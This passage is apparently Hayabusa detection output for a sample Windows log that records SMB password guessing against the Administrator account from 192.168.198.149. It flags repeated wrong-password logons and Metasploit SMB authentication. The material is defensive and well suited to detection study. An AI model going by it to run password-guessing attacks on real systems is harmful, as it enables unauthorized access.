SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: 
